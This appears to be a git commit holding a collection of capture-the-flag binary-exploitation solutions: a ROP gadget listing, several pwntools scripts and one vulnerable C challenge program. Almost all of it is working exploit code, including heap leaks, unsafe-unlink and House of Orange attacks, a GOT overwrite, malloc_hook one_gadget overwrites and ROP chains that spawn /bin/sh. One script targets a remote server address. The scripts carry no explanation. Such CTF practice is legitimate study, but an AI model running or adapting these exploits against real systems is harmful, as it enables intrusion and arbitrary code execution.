Commit 5aaeed30 authored by Mahesh Hari Sarma's avatar Mahesh Hari Sarma

Initial commit

parents
File added
from pwn import *
Gadgets information
============================================================
0x0000000000000bbf : add bl, dh ; ret
0x00000000000009f5 : add byte ptr [rax - 0x77], cl ; or al, 2 ; nop ; leave ; ret
0x0000000000000bbd : add byte ptr [rax], al ; add bl, dh ; ret
0x0000000000000bbb : add byte ptr [rax], al ; add byte ptr [rax], al ; add bl, dh ; ret
0x000000000000083c : add byte ptr [rax], al ; add byte ptr [rax], al ; pop rbp ; ret
0x0000000000000bbc : add byte ptr [rax], al ; add byte ptr [rax], al ; ret
0x0000000000000544 : add byte ptr [rax], al ; add eax, dword ptr [rax] ; ret 0
0x00000000000007ee : add byte ptr [rax], al ; pop rbp ; ret
0x0000000000000bbe : add byte ptr [rax], al ; ret
0x00000000000007ed : add byte ptr [rax], r8b ; pop rbp ; ret
0x000000000000087e : add byte ptr [rcx], al ; ret
0x000000000000087a : add eax, 0x2017a0 ; add ebx, esi ; ret
0x000000000000098b : add eax, 0xfffdc7e8 ; dec ecx ; ret
0x0000000000000546 : add eax, dword ptr [rax] ; ret 0
0x000000000000087f : add ebx, esi ; ret
0x0000000000000723 : add esp, 8 ; ret
0x0000000000000722 : add rsp, 8 ; ret
0x000000000000087d : and byte ptr [rax], al ; add ebx, esi ; ret
0x00000000000009f4 : and byte ptr [rax], al ; mov qword ptr [rdx + rax], rcx ; nop ; leave ; ret
0x0000000000000719 : and byte ptr [rax], al ; test rax, rax ; je 0x729 ; call rax
0x00000000000007e0 : and byte ptr [rax], al ; test rax, rax ; je 0x7f8 ; pop rbp ; jmp rax
0x000000000000082d : and byte ptr [rax], al ; test rax, rax ; je 0x848 ; pop rbp ; jmp rax
0x0000000000000b99 : call qword ptr [r12 + rbx*8]
0x0000000000000cd3 : call qword ptr [rax]
0x0000000000000b9a : call qword ptr [rsp + rbx*8]
0x0000000000000720 : call rax
0x00000000000008d7 : dec dword ptr [rax - 0x77] ; ret 0x8b48
0x0000000000000990 : dec ecx ; ret
0x0000000000000b9c : fmul qword ptr [rax - 0x7d] ; ret
0x0000000000000541 : imul ebp, dword ptr [rcx + 0xd], 0x30000 ; ret 0
0x000000000000071e : je 0x724 ; call rax
0x00000000000007e5 : je 0x7f3 ; pop rbp ; jmp rax
0x0000000000000832 : je 0x843 ; pop rbp ; jmp rax
0x00000000000008b2 : je 0x8a3 ; push rbp ; mov rbp, rsp ; call rax
0x00000000000007e8 : jmp rax
0x0000000000000c23 : jmp rsp
0x0000000000000903 : leave ; ret
0x00000000000007e9 : loopne 0x859 ; nop dword ptr [rax + rax] ; pop rbp ; ret
0x0000000000000879 : mov byte ptr [rip + 0x2017a0], 1 ; ret
0x00000000000009f7 : mov dword ptr [rdx + rax], ecx ; nop ; leave ; ret
0x00000000000008b6 : mov ebp, esp ; call rax
0x0000000000000b97 : mov edi, edi ; call qword ptr [r12 + rbx*8]
0x0000000000000b96 : mov edi, r15d ; call qword ptr [r12 + rbx*8]
0x00000000000009f6 : mov qword ptr [rdx + rax], rcx ; nop ; leave ; ret
0x00000000000008b5 : mov rbp, rsp ; call rax
0x0000000000000902 : nop ; leave ; ret
0x00000000000009c7 : nop ; pop rbp ; ret
0x00000000000007eb : nop dword ptr [rax + rax] ; pop rbp ; ret
0x0000000000000bb8 : nop dword ptr [rax + rax] ; ret
0x00000000000007ea : nop word ptr [rax + rax] ; pop rbp ; ret
0x0000000000000833 : or al, 0x5d ; jmp rax
0x00000000000009f8 : or al, 2 ; nop ; leave ; ret
0x0000000000000543 : or eax, 0x30000 ; ret 0
0x0000000000000bac : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000000bae : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000000bb0 : pop r14 ; pop r15 ; ret
0x0000000000000bb2 : pop r15 ; ret
0x00000000000007e7 : pop rbp ; jmp rax
0x0000000000000878 : pop rbp ; mov byte ptr [rip + 0x2017a0], 1 ; ret
0x0000000000000bab : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000000baf : pop rbp ; pop r14 ; pop r15 ; ret
0x00000000000007f0 : pop rbp ; ret
0x0000000000000bb3 : pop rdi ; ret
0x0000000000000bb1 : pop rsi ; pop r15 ; ret
0x0000000000000bad : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000000008b4 : push rbp ; mov rbp, rsp ; call rax
0x0000000000000726 : ret
0x0000000000000548 : ret 0
0x00000000000008da : ret 0x8b48
0x00000000000008b1 : sal byte ptr [rcx + rbp*8 + 0x55], 0x48 ; mov ebp, esp ; call rax
0x000000000000071d : sal byte ptr [rdx + rax - 1], 0xd0 ; add rsp, 8 ; ret
0x0000000000000bc5 : sub esp, 8 ; add rsp, 8 ; ret
0x0000000000000bc4 : sub rsp, 8 ; add rsp, 8 ; ret
0x000000000000083a : test byte ptr [rax], al ; add byte ptr [rax], al ; add byte ptr [rax], al ; pop rbp ; ret
0x0000000000000bba : test byte ptr [rax], al ; add byte ptr [rax], al ; add byte ptr [rax], al ; ret
0x000000000000071c : test eax, eax ; je 0x726 ; call rax
0x00000000000007e3 : test eax, eax ; je 0x7f5 ; pop rbp ; jmp rax
0x0000000000000830 : test eax, eax ; je 0x845 ; pop rbp ; jmp rax
0x00000000000008b0 : test eax, eax ; je 0x8a5 ; push rbp ; mov rbp, rsp ; call rax
0x000000000000071b : test rax, rax ; je 0x727 ; call rax
0x00000000000007e2 : test rax, rax ; je 0x7f6 ; pop rbp ; jmp rax
0x000000000000082f : test rax, rax ; je 0x846 ; pop rbp ; jmp rax
0x00000000000008af : test rax, rax ; je 0x8a6 ; push rbp ; mov rbp, rsp ; call rax
Unique gadgets found: 83
s=process('./300')
def add(idx):
s.sendlineafter("4) free\n",str(1))
s.sendlineafter("slot? (0-9)\n",str(idx))
def edit(idx,content):
s.sendlineafter("4) free\n",str(2))
s.sendlineafter("slot? (0-9)\n",str(idx))
s.sendline(content)
def view(idx):
s.sendlineafter("4) free\n",str(3))
s.sendlineafter("slot? (0-9)\n",str(idx))
def free(idx):
s.sendlineafter("4) free\n",str(4))
s.sendlineafter("slot? (0-9)\n",str(idx))
for i in range(10):
add(i)
for i in range(8):
free(i)
view(7)
leak_ub = u64(s.recv(6) + "\x00\x00")
libc_base = leak_ub-0x3ebca0
print "LIBC_BASE = " + str(hex(libc_base))
view(1)
leak = u64(s.recv(6) + "\x00\x00")
heap_base = leak-0x260
print "HEAP_LEAK = " + str(hex(heap_base))
free(9)
gdb.attach(s,'b*0x00005555555548D0')
s.interactive()
from pwn import *
#s=process('./dead_note_lv2',env={'LD_PRELOAD': './libc.so.6'})
s=remote("206.189.46.173",50200)
table=(0x602120)
fd=p64(table-0x18)
bk=p64(table-0x10)
atoi=p64(0x0000000000602068)
printf=p64(0x0000000000602038)
def add(content):
s.sendlineafter("Your choice: ",str(1))
s.sendlineafter("Content: ",content)
def edit(idx,content):
s.sendlineafter("Your choice: ",str(2))
s.sendlineafter("Index: ",str(idx))
s.sendafter("Content: ",content)
def delete(idx):
s.sendlineafter("Your choice: ",str(3))
s.sendlineafter("Index: ",str(idx))
for i in range(10):
delete(0)
print "for loop 1 done "
for i in range(10):
add("a"*8)
edit(8, p64(0x00) + p64(0x81) +
fd + bk +
"a"*0x60 +
p64(0x80) + '\n')
print "for loop 2 done"
add("b"*8)
for i in range(153):
delete(2)
print "for loop 3 done"
edit(10,p64(0x90) + '\n')
delete(9)
edit(8,atoi)
printf=p64(0x0000000000400750)
edit(5,printf)
print "atoi overwritten"
s.sendlineafter("Your choice: ","zz%13$p")
s.recvuntil("zz")
leak = s.recv(14)
print "leak = " + leak
leak=int(leak,16)
system = leak + 150368
print "system = " + str(hex(system))
#edit(1, p64(system) + '\n')
s.sendlineafter("Your choice: ",str(11))
s.sendlineafter("Index: ",str(11112))
s.sendlineafter("Content: ",p64(system))
s.sendlineafter("Your choice: ","/bin/sh")
s.interactive()
from pwn import *
def form(addr):
a=str(int(addr,16))
b=a+"a"*(32-(len(a)))
return b
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
sys_off=libc.symbols['system']
#print sys_off
puts_off=libc.symbols['puts']
#print write_off
off_diff=sys_off-puts_off
#print off_diff
shell_off=next(libc.search('/bin/sh'))
#print shell_off
shell_diff=shell_off-puts_off
int80=p32(0x0806da43)
pop_eax=p32(0x08052b14)
pop_ebx=p32(0x080481c9)
pop_ecx=p32(0x080dedf5)
pop_edx=p32(0x0806fdda)
leave_ret=form('0x80488b7')
refno=p32(0x0b)
inc_eax=form('0x0807b61f')
shell1="/bin"
shell2="//sh"
shelladdr1=p32(0x80ea060)
shelladdr2=p32(0x80ea064)
nulladdr=p32(0x80ea074)
rw=form('0x080eaf80')
read=form('0x804887c')
new_ebp=form('0x80eba24')
real_ebp=form('0x80eba6c')
junk=form('0x80ea000')
mov_dword_edx_eax=p32(0x080557cb)
mov_esp_ecx=form('0x080b8572')
exploit1 = ("1"+"a"*31)
exploit1 += junk*28
exploit1 += mov_esp_ecx
exploit1 += read
exploit1 += new_ebp
print exploit1
print "length of exploit =" + str(len(exploit1))
s=process('./sort')
gdb.attach(s,'b*0x08048bbc')
s.sendlineafter('Enter the no. of elements to be sorted:','32')
s.sendafter('Give me the no. :',exploit1)
s.recvuntil('Here\'s the sorted list :')
exploit2= pop_edx + shelladdr1 + pop_eax + shell1 + mov_dword_edx_eax + pop_edx+ shelladdr2 + pop_eax + shell2 + mov_dword_edx_eax + pop_eax + refno + pop_ebx + shelladdr1 + pop_ecx + nulladdr + pop_edx + nulladdr + int80
s.sendline(exploit2)
s.interactive()
from pwn import *
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
sys_off=libc.symbols['system']
#print sys_off
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
env_off=libc.symbols['environ']
print env_off
puts_off=libc.symbols['puts']
#print write_off
off_diff=sys_off-puts_off
#print off_diff
shell_off=next(libc.search('/bin/sh'))
#print shell_off
shell_diff=shell_off-puts_off
main=p64(0x400636)
leave_ret=p64(0x0000000000400695)
add_rsp_8=p64(0x00000000004004c5)
pop_rsi_r15=p64(0x0000000000400701)
pop_rdi=p64(0x0000000000400703)
pop_rbp=p64(0x00000000004005a0)
read_plt=p64(0x0000000000400500)
puts_plt=p64(0x400670)
puts_got=p64(0x0000000000601018)
bss=p64(0x601ff0)
ret1=p64(0x601f78)
read_main=p64(0x400675)
junk="a"*112
exploit = junk + bss + read_main
exploit2=pop_rdi + puts_got + pop_rbp + bss + puts_plt + "c"*72 + ret1 + leave_ret
s=process('./warmup')
#gdb.attach(s,'b*0x400696')
s.sendafter('!',exploit)
s.send(exploit2)
s.recv(1)
leak=s.recvline()
leak=leak+"\x00"
leak=u64(leak)
leak=hex(leak)
leak=str(leak)
leak=leak.translate(None,"a")
leak=int(leak,16)
system=leak+off_diff
shell=leak+shell_diff
print "system=" + hex(system)
print "shell=" + hex(shell)
shell=p64(shell)
system=p64(system)
exploit3=pop_rdi + shell + system + "d"*8 + leave_ret + "d"*72 + ret1 + leave_ret
s.sendline(exploit3)
s.interactive()
from pwn import *
s=process("./buttercup")
context.log_level="debug"
def add(size,idx):
s.sendlineafter(">> ",str(1))
s.sendlineafter("Enter size of input",str(size))
s.sendlineafter("Enter index",str(idx))
def delete(idx):
s.sendlineafter(">> ",str(2))
s.sendlineafter("Enter index",str(idx))
def edit(idx,content):
s.sendlineafter(">> ",str(3))
s.sendlineafter("Enter index",str(idx))
s.send(content)
def view():
s.sendlineafter(">> ",str(4))
def change(content):
s.sendlineafter(">> ",str(5))
s.sendline(content)
def flip(addr):
s.sendlineafter(">> ",str(1337))
s.sendlineafter("Address : ",str(addr))
add(200,0)
add(200,1)
delete(0)
add(200,0)
view()
s.recvuntil("0 => ")
libc_base=u64(s.recv(6) + "\x00\x00")-3951480
print "libc_base = " + str(hex(libc_base))
malloc_hook=libc_base+0x3c4b10
one_gadget=libc_base+0xf02a4
delete(0)
delete(1)
add(96,0)
add(96,1)
add(96,2)
add(96,3)
delete(0)
delete(1)
delete(2)
add(96,0)
view()
s.recvuntil("0 => ")
heap_base=u64(s.recv(6) + "\x00\x00")-368
print "heap_base = " + str(hex(heap_base))
author=heap_base+0x10
chunk_size=heap_base+920
offset=896
size_chunk=heap_base+0xe0
delete(0)
delete(3)
add(200,0)
add(200,1)
add(200,2)
change(p64(0x200) + p64(offset+1) + p64(author)*4)
flip(chunk_size)
edit(0,"a"*192 + p64(offset))
delete(1)
add(300,2)
edit(2,"a"*(0x78-24) + p64(malloc_hook) + p64(size_chunk)*2)
edit(0,p64(one_gadget))
delete(1)
delete(2)
s.interactive()
from pwn import *
s=process('./gryffindor_reloaded')
gdb.attach(s,"b _int_malloc")
def add(size,idx):
s.sendlineafter(">> ",str(1))
s.sendlineafter("Enter size of input",str(size))
s.sendlineafter("Enter index",str(idx))
def delete():
s.sendlineafter(">> ",str(2))
def edit(idx,size,content):
s.sendlineafter(">> ",str(3))
s.sendlineafter("Enter index",str(idx))
s.sendlineafter("Enter size",str(size))
s.sendline(content)
add(0x400-0x10,0)
edit(0,0x400, "a"*(0x400-16) + p64(0x00)+ p64(0xc01))
add(0x2000,1)
add(0x100-0x10,2)
edit(0,0x400,"b"*0x3fc + "z"*4)
s.recvuntil("zzzz")
leak=u64(s.recv(6)+"\x00\x00")
_IO_list_all=leak+0x3c8
libc_base=leak+0x3e8-3953984
system=libc_base+283536
main_arena=leak+0x20
print "main_arena = " + str(hex(main_arena))
print "_IO_list_all = " + str(hex(_IO_list_all))
print "libc_base = " + str(hex(libc_base))
edit(0,0x411, "zzzz".rjust(0x411,"b"))
s.recvuntil("zzzz")
heap_base=u64("\x00" + s.recv(5)+"\x00\x00")-0x400
print "heap_base = " + str(hex(heap_base))
edit(0,0x800,p64(system)*(0x4f0/8) +
"/bin/sh"+ "\x00" + p64(0x61) +
p64(main_arena) + p64(_IO_list_all-0x10) +
p64(0x2) + p64(0x3) +
"\x00"*0xa8 +
p64(heap_base+0x10) +
"b")
add(20,3)
s.interactive()
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
char *table[10] = {0};
int get_inp(char * buffer, int len) {
int retval = read(0, buffer, len);
if ( retval == -1)
exit(0);
char *ptr = strchr(buffer, 10);
if (ptr != NULL)
*ptr = '\0';
return 0;
}
int getint() {
char buffer[32];
get_inp(buffer, 32);
return atoi(buffer);
}
int add() {
long long size = 0;
char *ptr = NULL;
puts("Enter size of input");
size = getint();
ptr = malloc(size);
if ( ptr == NULL)
exit(0);
puts("Enter index");
int idx = getint();
if ( idx < 0 || idx > 9) {
puts("Invalid index");
return 1;
}
table[idx] = ptr;
return 0;
}
int delete() {
puts("Nope");
return 0;
}
int edit() {
int size, idx, len;
puts( "Enter index");
idx = getint();
if ( idx < 0 || idx > 9 || table[idx] == NULL) {
puts("Invalid index");
return 1;
}
puts("Enter size");
size = getint();
get_inp(table[idx], size);
len = strlen(table[idx]);
write(1, table[idx], len);
return 0;
}
void printmenu() {
puts( "1) Add\n2) Delete\n3) Edit\n4) Exit\n");
printf(">> ");
}
int main() {
alarm(30);
setvbuf(stdout, NULL, _IONBF, 0);
do {
printmenu();
switch (getint()) {
case 1: add(); break;
case 2: delete(); break;
case 3: edit(); break;
case 4: exit(0);
default: puts("Invalid choice"); break;
}
} while(1);
return 0;
}
from pwn import *
libc=ELF("libc.so.6")
s=process("./aiRcraft")
def buy_plane(company,name):
s.sendlineafter("Your choice: ","1")
s.sendlineafter("Your choice: ",str(company))
s.sendlineafter("Input the plane's name: ",name)
def build_port(size,name):
s.sendlineafter("Your choice: ","2")
s.sendlineafter("How long is the airport's name? ",str(size))
s.sendlineafter("Please input the name: ",name)
def enter_port(idx):
s.sendlineafter("Your choice: ","3")
s.sendlineafter("Which airport do you want to choose? ",str(idx))
def select_plane(name):
s.sendlineafter("Your choice: ","4")
s.sendlineafter("Which plane do you want to choose? ",name)
def list_port():
s.sendlineafter("Your choice: ","1")
def free_port():
s.sendlineafter("Your choice: ","2")
def exit(ch):
s.sendlineafter("Your choice: ",str(ch))
def fly(name):
s.sendlineafter("Your choice: ","1")
s.sendlineafter("which airport do you want to fly? ",name)
def free_plane():
s.sendlineafter("Your choice: ","2")
def heap_leak():
build_port(130,"port1")
buy_plane(1,"plane1")
buy_plane(2,"plane2")
select_plane("plane2")
free_plane()
select_plane("plane1")
fly("0")
free_plane()
enter_port(0)
list_port()
def libc_leaker():
build_port(30,"port2")
build_port(30,"port3")
build_port(30,"port4")
enter_port(1)
free_port()
enter_port(2)
free_port()
enter_port(3)
free_port()
build_port(136,heap_libc)
buy_plane(3,"plane")
select_plane("plane")
fly("2")
heap_leak()
s.recvuntil("Plane name: ")
heap=s.recv(6)
heap = heap + "\x00\x00"
heap_base = u64(heap)-336-32
print "heap_base = " + str(hex(heap_base))
heap_libc=heap_base+848
heap_libc=hex(heap_libc)
heap_libc=p64(int(heap_libc,16))
exit(3)
libc_leaker()
s.recvuntil("plane to ")
libc_leak=s.recv(6)
libc_leak=libc_leak+"\x00\x00"
libc_leak=u64(libc_leak)
libc_base=libc_leak-0x3c4b78
one_gadget=p64(libc_base+0xf02a4)
print "libc_base = " + str(hex(libc_base))
malloc_chunk=p64(int(hex(libc_leak-123-16),16))
print "malloc_chunk = " + hex(u64(malloc_chunk))
exit(3)
build_port(96,"a"*32 + heap_libc*3)
build_port(96,"p"*32 + heap_libc*3)
chunk1=p64(heap_base+0x410)
chunk2=p64(heap_base+0x510)
enter_port(0)
free_port()
enter_port(1)
free_port()
build_port(136,heap_libc + chunk1 + chunk2 + chunk1)
enter_port(1)
free_port()
build_port(96,malloc_chunk)
build_port(96,"f"*8)
build_port(96,"f"*8)
build_port(96,"f"*19 + one_gadget)
enter_port(4)
free_port()
enter_port(4)
free_port()
s.interactive()